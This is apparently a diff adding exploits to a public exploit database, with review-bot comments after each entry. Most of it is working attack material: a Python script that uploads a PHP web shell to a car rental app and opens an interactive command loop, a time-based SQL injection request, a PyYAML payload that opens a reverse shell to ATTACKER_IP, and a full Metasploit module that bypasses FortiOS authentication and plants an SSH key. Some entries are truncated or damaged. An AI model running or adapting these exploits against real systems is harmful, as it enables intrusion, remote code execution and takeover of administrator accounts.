token = session_cookie_dic["PHPSESSID"]
print("[+] Session cookie: {}".format(token))
# proxy for Burp testing
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
# data for uploading the backdoor request
backdoor_file = {
"img1": (
"1dccadfed7bcbb036c56a4afb97e906f.php",
'<?php system($_GET["cmd"]); ?>',
"Content-Type application/x-php",
)
}
backdoor_data = {"update": ""}
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
# actually upload the php shell
try:
r = sessionObj.post(url=SHELL_UPLOAD_URL, files=backdoor_file, data=backdoor_data)
print("[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" + bigstring)
except:
print("[!] Failed to upload backdoor")
# get command execution
while True:
COMMAND = str(input('\033[32m' + "Command RCE >> " + '\033[m'))
SHELL_LOCATION = "http://" + RHOSTS + "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php"
# get R,CE results
respond = sessionObj.get(SHELL_LOCATION + "?cmd=" + COMMAND)
print(respond.text)
if __name__ == "__main__":
login()
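Review bot: `print("[+] Victim host: {}".format(RHOSTs))` refers to `RHOSTs`, but the variable is `RHOSTS`, so the script raises `NameError` immediately after creating the session and never reaches the login or upload. Further down: the bare `except:` around the upload swallows every exception (including `KeyboardInterrupt`), and the success message in the `try` body is printed without checking `r.status_code`, so a rejected upload is still reported as a success; the `proxies` dict is built but never passed to any request; `SHELL_UPLOAD_URL` is assigned twice with the same value; the command is concatenated into the query string without URL-encoding, so spaces and `&` break it; and the third tuple element `"Content-Type application/x-php"` is missing its colon. In the manual PoC, the path `.../vehicleimages/.php` has lost the uploaded filename. The credentials `admin` / `Test@12345` are hard-coded and should be parameters.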

@ -0,0 +1,15 @@
# Exploit Title: KodExplorer 4.52 - Open Redirect
# Date: 2024-11-08
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://kodcloud.com/
# Software Link: https://github.com/kalcaddle/KodExplorer/releases/tag/4.52
# Version: 4.52
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
*Steps to Reproduce:*
1. At first visit this url http://target.com/index.php?user/login&link=.
2. Then use any malicious url in link parameter.
3. your link will be look like:
http://target.com/index.php?user/login&link=https://{site}.com
4. login your account and you will redirect to malicious url.
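Review bot: step 1's URL ends in `&link=.` where the trailing period is ambiguous between punctuation and the parameter value, and `{site}` in step 3 is a placeholder that should be labelled as one. Steps 2 to 4 can be collapsed into the actual finding: after login the application redirects to whatever `link` contains without checking it against its own origin. There is no `# CVE :` line, and no remediation; the fix is to accept only relative paths (or same-origin URLs) for `link`.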

@ -0,0 +1,52 @@
# Exploit Title: Smart Manager 8.27.0 - Post-Authenticated SQL Injection
# Date: 2024-01-18
# Exploit Author: Ivan Spiridonov - xbz0n
# Vendor Homepage: https://www.storeapps.org/
# Software Link: https://www.storeapps.org/product/smart-manager/
# Version: 8.27.0
# Tested on: Ubuntu 22.04
# CVE: CVE-2024-0566
## SQL Injection
The plugin does not properly sanitize and escape a parameter before using it in an SQL statement, leading to an SQL injection exploitable by high-privilege users such as admin.
## Affected Components
- **Plugin:** Smart Manager
- **Version:** 8.27.0
- **Affected Parameters:** 'sort_params%5BsortOrder%5D', 'sort_params%5Bcolumn%5D'
- **Affected Endpoint:** /wp-admin/admin-ajax.php
## Description
The vulnerability is located within the admin AJAX endpoint in the sorting parameters 'sort_params%5BsortOrder%5D' and 'sort_params%5Bcolumn%5D'. By manipulating these parameters, authenticated attackers can inject SQL commands, leading to a time-based SQL Injection vulnerability.
## Proof of Concept
### Manual Exploitation
```http
POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0
```
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
## Recommendations
Users of Smart Manager v8.27.0 are strongly advised to restrict access to the affected endpoint and update the plugin to the latest version.
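Review bot: the captured request is damaged at the `Cookie:` line: the cookie value is missing and the following header, `Sec-Fetch-Dest: empty`, has been folded onto it, so the request as shown carries no session and would not reach the authenticated code path. Put `Sec-Fetch-Dest` on its own line and restore the cookie with an obvious placeholder. `Content-Length: 1117` should be re-checked against the body, and `security=37e8d818b7` is a WordPress nonce bound to the session, which the text should say rather than present as a constant. Recommendations could name the fix as well as the upgrade: allow-list the sortable column names and the `asc`/`desc` keywords before they reach the query.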

@ -0,0 +1,31 @@
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392
# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.
# POC
# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"
# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or
# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.
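Review bot: the invocation on the `> python convert_mlcvnets_to_pytorch.py ...` line is cut off after `--or`, and the note beneath it refers to `dummy_output` and `task` arguments that do not appear in the visible command; either restore the full command from the original submission or mark it as truncated rather than leaving a half flag. `metioned` is a typo. One sentence on the root cause would help defenders: the `!!python/object/new:type` and `!!python/name:exec` tags in the YAML are honoured only by PyYAML's unsafe/full loader; `yaml.safe_load` rejects them, which is the mitigation for any script that loads third-party model configs.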

@ -0,0 +1,16 @@
# Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
# Date: 25-01-2024
# Exploit Author: Rasime Ekici
# Vendor Homepage: www.softwareag.com
# Version: 10.15.0000-0092
# Tested on: 10.15.0000-0092
# CVE : 2024-23733
Description:
The /WmAdmin/,/invoke/vm.server/login login page in the Integration Server in Software AG webMethods 10.15.0 before Core Fix7 allows remote attackers to reach the administration panel,discovering server hostname and version information by sending arbitary username and blank password to the /WmAdmin/#/login/ uri
Interpret the http traffic and send a dummy username with blank password on login screen and drop the request to "/admin/navigation/license" to not logged out.Thus you may able to see:
-real hostname of the installed server
-version info
-administrative api endpoints
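Review bot: the `# CVE :` line reads `2024-23733` without the `CVE-` prefix, and `# Version:` / `# Tested on:` both give `10.15.0000-0092` while the title says `10.15.0.0000-0092`. The description runs its items together: `/WmAdmin/,/invoke/vm.server/login` and `panel,discovering` need spaces after the commas, `arbitary` should be `arbitrary`, and `to not logged out.Thus` should read `so that you are not logged out. Thus`. The first sentence already names the vendor fix (Core Fix 7); list it as the remediation.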

exploits/windows/remote/52239.py Executable file
@ -0,0 +1,279 @@
# Exploit Title: Fortinet FortiOS, FortiProxy, and FortiSwitchManager 7.2.0 - Authentication bypass
# Date: 2022-10-10
# Exploit Author: Zach Hanley, SC
# Vendor Homepage: https://www.fortinet.com
# Version: 7.0.0
# Tested on: Linux
# CVE : CVE-2022-40684
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::SSH
prepend Msf::Exploit::Remote::AutoCheck
attr_accessor :ssh_socket
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.',
'Description' => %q{
This module exploits an authentication bypass vulnerability
in the Fortinet FortiOS, FortiProxy, and FortiSwitchManager API
to gain access to a chosen account. And then add a SSH key to the
authorized_keys file of the chosen account, allowing
to login to the system with the chosen account.
Successful exploitation results in remote code execution.
},
'Author' => [
'Heyder Andrade <@HeyderAndrade>', # Metasploit module
'Zach Hanley <@hacks_zach>', # PoC
],
'References' => [
['CVE', '2022-40684'],
['URL', 'https://www.fortiguard.com/psirt/FG-IR-22-377'],
['URL', 'https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684'],
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2022-10-10', # Vendor advisory
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Privileged' => true,
'Targets' => [
[
'FortiOS',
{
'DefaultOptions' => {
'PAYLOAD' => 'generic/ssh/interact'
},
'Payload' => {
'Compat' => {
'PayloadType' => 'ssh_interact'
}
}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [
IOC_IN_LOGS,
ARTIFACTS_ON_DISK # SSH key is added to authorized_keys file
]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the Fortinet CMDB API', '/api/v2/cmdb/']),
OptString.new('USERNAME', [false, 'Target username (Default: auto-detect)', nil]),
OptString.new('PRIVATE_KEY', [false, 'SSH private key file path', nil]),
OptString.new('KEY_PASS', [false, 'SSH private key password', nil]),
OptString.new('SSH_RPORT', [true, 'SSH port to connect to', 22]),
OptBool.new('PREFER_ADMIN', [false, 'Prefer to use the admin user if one is detected', true])
]
)
end
def username
if datastore['USERNAME']
@username ||= datastore['USERNAME']
else
@username ||= detect_username
end
end
def ssh_rport
datastore['SSH_RPORT']
end
def current_keys
@current_keys ||= read_keys
end
def ssh_keygen
# ssh-keygen -t rsa -m PEM -f `openssl rand -hex 8`
if datastore['PRIVATE_KEY']
@ssh_keygen ||= Net::SSH::KeyFactory.load_data_private_key(
File.read(datastore['PRIVATE_KEY']),
datastore['KEY_PASS'],
datastore['PRIVATE_KEY']
)
else
@ssh_keygen ||= OpenSSL::PKey::EC.generate('prime256v1')
end
end
def ssh_private_key
ssh_keygen.to_pem
end
def ssh_pubkey
Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
end
def authorized_keys
pubkey = Rex::Text.encode_base64(ssh_keygen.public_key.to_blob)
"#{ssh_keygen.ssh_type} #{pubkey} #{username}@localhost"
end
def fortinet_request(params = {})
send_request_cgi(
{
'ctype' => 'application/json',
'agent' => 'Report Runner',
'headers' => {
'Forwarded' => "for=\"[127.0.0.1]:#{rand(1024..65535)}\";by=\"[127.0.0.1]:#{rand(1024..65535)}\""
}
}.merge(params)
)
end
def check
vprint_status("Checking #{datastore['RHOST']}:#{datastore['RPORT']}")
# a normal request to the API should return a 401
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
'ctype' => 'application/json'
})
return CheckCode::Unknown('Target did not respond to check.') unless res
return CheckCode::Safe('Target seems not affected by this vulnerability.') unless res.code == 401
# Trying to bypasss the authentication and get the sshkey from the current targeted user it should return a 200 if vulnerable
res = fortinet_request({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/system/status')
})
return CheckCode::Safe unless res&.code == 200
version = res.get_json_document['version']
print_good("Target is running the version #{version}, which is vulnerable.")
Socket.tcp(rhost, ssh_rport, connect_timeout: datastore['SSH_TIMEOUT']) { |sock| return CheckCode::Safe('However SSH is not open, so adding a ssh key wouldn\t give you access to the host.') unless sock }
    CheckCode::Vulnerable('And SSH is running which makes it exploitable.')
  end

  def cleanup
    return unless ssh_socket

    # Assumes our key is the last entry and blanks it (sets it to an empty string);
    # the API did not respond to the DELETE method.
    data = {
      "ssh-public-key#{current_keys.empty? ? '1' : current_keys.size}" => '""'
    }
    fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => data.to_json
    })
  end

  def detect_username
    vprint_status('User auto-detection...')
    res = fortinet_request(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin')
    )
    # Only super_admin accounts with an unrestricted trusted host are candidates.
    users = res.get_json_document['results'].collect { |e| e['name'] if (e['accprofile'] == 'super_admin' && e['trusthost1'] == '0.0.0.0 0.0.0.0') }.compact
    # We prefer to use admin, but if it doesn't exist we choose a random one.
    if datastore['PREFER_ADMIN']
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, but if it isn't found we will pick a random one.")
      users.include?('admin') ? 'admin' : users.sample
    else
      vprint_status("PREFER_ADMIN is #{datastore['PREFER_ADMIN']}, we will pick a random user that is not admin.")
      (users - ['admin']).sample
    end
  end

  def add_ssh_key
    if current_keys.include?(authorized_keys)
      # The key will still be removed on cleanup.
      print_good('Your key is already in the authorized_keys file')
      return
    end

    vprint_status('Adding SSH key to authorized_keys file')
    # Add the SSH key as the last entry in the authorized_keys file
    keystoadd = current_keys.first(2) + [authorized_keys]
    data = keystoadd.map.with_index { |key, idx| ["ssh-public-key#{idx + 1}", "\"#{key}\""] }.to_h
    res = fortinet_request({
      'method' => 'PUT',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username),
      'data' => data.to_json
    })
    fail_with(Failure::UnexpectedReply, 'Failed to add SSH key to authorized_keys file.') unless res&.code == 500

    body = res.get_json_document
    fail_with(Failure::UnexpectedReply, 'Unexpected response from the server after adding the key.') unless body.key?('cli_error') && body['cli_error'] =~ /SSH key is good/
  end

  def read_keys
    vprint_status('Reading SSH key from authorized_keys file')
    res = fortinet_request({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/system/admin/', username)
    })
    fail_with(Failure::UnexpectedReply, 'Failed to read current SSH keys') unless res&.code == 200

    result = res.get_json_document['results'].first
    ['ssh-public-key1', 'ssh-public-key2', 'ssh-public-key3'].map do |key|
      result[key].gsub('"', '') unless result[key].empty?
    end.compact
  end

  def do_login(ssh_options)
    # Ensure we don't have a stale socket hanging around
    ssh_options[:proxy].proxies = nil if ssh_options[:proxy]
    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        self.ssh_socket = Net::SSH.start(rhost, username, ssh_options)
      end
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Disconnected during negotiation')
    rescue Net::SSH::Disconnect, ::EOFError
      fail_with(Failure::Disconnected, 'Timed out during negotiation')
    rescue Net::SSH::AuthenticationFailed
      fail_with(Failure::NoAccess, 'Failed authentication')
    rescue Net::SSH::Exception => e
      fail_with(Failure::Unknown, "SSH Error: #{e.class} : #{e.message}")
    end
    fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
  end

  def exploit
    print_status("Executing exploit on #{datastore['RHOST']}:#{datastore['RPORT']} target user: #{username}")
    add_ssh_key
    vprint_status('Establishing SSH connection')
    ssh_options = ssh_client_defaults.merge({
      auth_methods: ['publickey'],
      key_data: [ssh_private_key],
      port: ssh_rport
    })
    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
    do_login(ssh_options)
    handler(ssh_socket)
  end
end


@ -3259,6 +3259,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
36813,exploits/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",local,hardware,,2015-04-21,2015-04-21,0,CVE-2014-7951;OSVDB-120991,,,,,
44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13108,Local,,,,
44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware,,2018-07-05,2018-07-05,0,CVE-2018-13110,Local,,,,
52244,exploits/hardware/local/52244.txt,"ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2023-26602,,,,,
40271,exploits/hardware/local/40271.txt,"Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation",2016-08-19,"Shadow Brokers",local,hardware,,2016-08-19,2016-09-15,0,CVE-2016-6367,,,,,
30237,exploits/hardware/local/30237.sh,"Cisco Unified Communications Manager - TFTP Service",2013-12-12,"daniel svartman",local,hardware,,2013-12-12,2013-12-18,1,CVE-2013-7030;OSVDB-100916,,,,,
34954,exploits/hardware/local/34954.txt,"Cisco Unified Communications Manager 8.0 - Invalid Argument Privilege Escalation",2010-11-03,"Knud Erik Hjgaard",local,hardware,,2010-11-03,2014-10-14,1,CVE-2010-3039;OSVDB-69158,,,,,https://www.securityfocus.com/bid/44672/info
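Review bot: the 52244 row (ASUS ASMB8 iKVM 1.14.51) describes a "Remote Code Execution (RCE)" while its type column is `local` and the file sits under exploits/hardware/local/; the two fields contradict each other, so either the type should be `remote` (with the file moved to exploits/hardware/remote/) or the description should drop the remote wording.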
@ -3279,6 +3280,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
9955,exploits/hardware/local/9955.txt,"Overland Guardian OS 5.1.041 - Local Privilege Escalation",2009-10-20,trompele,local,hardware,,2009-10-19,,1,CVE-2009-4607;OSVDB-61789,,,,,
41745,exploits/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",local,hardware,,2017-03-27,2017-03-27,1,CVE-2017-5227;NAS-201703-21,,,,,http://www.ush.it/team/ush/hack-qnap/qnap.txt
32370,exploits/hardware/local/32370.txt,"Quantum vmPRO 3.1.2 - Local Privilege Escalation",2014-03-19,xistence,local,hardware,,2014-03-19,2014-03-19,0,OSVDB-104664,,,,,
52242,exploits/hardware/local/52242.txt,"Ruckus IoT Controller 1.7.1.0 - Undocumented Backdoor Account",2025-04-16,ub3rsick,local,hardware,,2025-04-16,2025-04-16,0,CVE-2021-33216,,,,,
51832,exploits/hardware/local/51832.c,"Saflok - Key Derication Function Exploit",2024-02-28,planthopper3301,local,hardware,,2024-02-28,2024-02-28,0,,,,,,
20999,exploits/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
21000,exploits/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,local,hardware,,2001-07-10,2012-09-02,1,CVE-2001-1177;OSVDB-1898,,,,,https://www.securityfocus.com/bid/3008/info
@ -3546,6 +3548,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15842,exploits/hardware/remote/15842.txt,"DD-WRT 24-preSP2 - Information Disclosure",2010-12-29,"Craig Heffner",remote,hardware,,2010-12-29,2011-09-18,1,OSVDB-70230,,,,,
9209,exploits/hardware/remote/9209.txt,"DD-WRT HTTPd Daemon/Service - Remote Command Execution",2009-07-20,gat3way,remote,hardware,,2009-07-19,2016-10-27,1,OSVDB-57143;CVE-2009-2766;CVE-2009-2765;OSVDB-55990;CVE-2008-6975;OSVDB-55636;CVE-2008-6974,,,,,
7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",remote,hardware,,2008-12-07,,1,CVE-2008-6975;CVE-2008-6974;OSVDB-55636,,,,,
52246,exploits/hardware/remote/52246.py,"Dell EMC iDRAC7/iDRAC8 2.52.52.52 - Remote Code Execution (RCE)",2025-04-16,Photubias,remote,hardware,,2025-04-16,2025-04-16,0,CVE-2018-1207,,,,,
51248,exploits/hardware/remote/51248.py,"Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure",2023-04-05,"Ken Pyle",remote,hardware,,2023-04-05,2023-04-05,0,CVE-2020-5330;CVE-2019-15993,,,,,
50880,exploits/hardware/remote/50880.txt,"Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
50878,exploits/hardware/remote/50878.html,"Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)",2022-04-19,LiquidWorm,remote,hardware,,2022-04-19,2022-04-19,0,,,,,,
@ -4429,6 +4432,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47979,exploits/hardware/webapps/47979.txt,"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting",2020-01-29,LiquidWorm,webapps,hardware,,2020-01-29,2020-01-30,0,,"Cross-Site Scripting (XSS)",,,,
47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,CVE-2019-7666,,,,,
47638,exploits/hardware/webapps/47638.sh,"FlexAir Access Control 2.4.9api3 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,,2019-11-12,2019-11-12,0,,,,,,
52240,exploits/hardware/webapps/52240.py,"FLIR AX8 1.46.16 - Remote Command Injection",2025-04-16,ub3rsick,webapps,hardware,,2025-04-16,2025-04-16,0,CVE-2022-37061,,,,,
45597,exploits/hardware/webapps/45597.txt,"FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
45602,exploits/hardware/webapps/45602.py,"FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
45606,exploits/hardware/webapps/45606.txt,"FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure",2018-10-15,LiquidWorm,webapps,hardware,,2018-10-15,2018-10-15,0,,,,,,
@ -10404,6 +10408,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
52215,exploits/multiple/hardware/52215.txt,"ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,,
52216,exploits/multiple/hardware/52216.txt,"ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48839,,,,,
52224,exploits/multiple/hardware/52224.txt,"ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51546,,,,,
52231,exploits/multiple/hardware/52231.html,"ABB Cylon Aspect 3.08.02 - Cross-Site Request Forgery (CSRF)",2025-04-16,LiquidWorm,hardware,multiple,,2025-04-16,2025-04-16,0,CVE-2024-48846,,,,,
52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
52220,exploits/multiple/hardware/52220.txt,"ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,,,,,,
52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,,
@ -11919,6 +11924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,,2021-01-22,2021-01-22,0,,,,,,
48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,,2020-04-24,2020-04-24,0,,,,,,
38016,exploits/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' SQL Injection",2012-11-09,anonymous,webapps,multiple,,2012-11-09,2017-11-09,1,CVE-2012-4949;OSVDB-87277,,,,,https://www.securityfocus.com/bid/56474/info
52241,exploits/multiple/webapps/52241.txt,"Ethercreative Logs 3.0.3 - Path Traversal",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-23409,,,,,
10209,exploits/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",webapps,multiple,,2009-10-13,,1,CVE-2009-3828;OSVDB-59139,,2009-11-22-EverFocus_Edsr_Exploit.tar.gz,,,
52126,exploits/multiple/webapps/52126.py,"Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)",2025-04-05,"Al Baradi Joy",webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2024-1234,,,,,
49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,,2020-12-02,2020-12-02,0,,,,,,
@ -11959,6 +11965,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43442,exploits/multiple/webapps/43442.txt,"FTP Service < 1.2 - Multiple Vulnerabilities",2003-06-03,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00007,,,,,http://gulftech.org/advisories/FTP%20Service%20Multiple%20Vulnerabilities/7
51550,exploits/multiple/webapps/51550.py,"FuguHub 8.1 - Remote Code Execution",2023-07-03,redfire359,webapps,multiple,,2023-07-03,2023-07-03,0,CVE-2023-24078,,,,,
51480,exploits/multiple/webapps/51480.txt,"FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)",2023-05-23,"Andrea Intilangelo",webapps,multiple,,2023-05-23,2023-05-23,0,CVE-2023-25439,,,,,
52238,exploits/multiple/webapps/52238.txt,"Garage Management System 1.0 (categoriesName) - Stored XSS",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2022-41358,,,,,
50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",2022-07-29,"Amel BOUZIANE-LEBLOND",webapps,multiple,,2022-07-29,2022-07-29,0,,,,,,
37757,exploits/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XML External Entity",2015-08-12,"David Bloom",webapps,multiple,,2015-08-15,2017-11-02,0,OSVDB-125901,,,,,
52144,exploits/multiple/webapps/52144.txt,"GeoVision GV-ASManager 6.1.0.0 - Information Disclosure",2025-04-08,"Giorgi Dograshvili",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2024-56902,,,,,
@ -12156,7 +12163,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48772,exploits/multiple/webapps/48772.txt,"Nagios Log Server 2.1.6 - Persistent Cross-Site Scripting",2020-08-28,"Jinson Varghese Behanan",webapps,multiple,,2020-08-28,2020-08-28,0,,,,,,
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
